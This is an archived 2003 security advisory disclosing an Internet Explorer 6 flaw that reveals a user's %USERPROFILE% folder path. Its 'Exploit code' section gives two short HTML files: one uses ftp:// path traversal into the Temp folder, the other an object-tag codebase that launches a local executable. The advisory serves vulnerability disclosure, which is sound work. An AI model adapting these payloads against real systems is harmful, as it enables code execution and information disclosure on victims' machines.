Redirecting

TUCoPS :: Browsers :: bt356.txt

Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]


Date:
~~~~~~~~~~~~~~~~~
5 June 2003


Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]


Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1


Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.

ex.) %USERPROFILE% = "C:\Documents and Settings\victim"


Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".


Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>


Workaround:
~~~~~~~~~~~~~~~~~
None.


Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.


- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy@bp.iij4u.or.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk
ABdf8AVY3NtdcBgzsS7VHm+J
=52pX
-----END PGP SIGNATURE-----


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH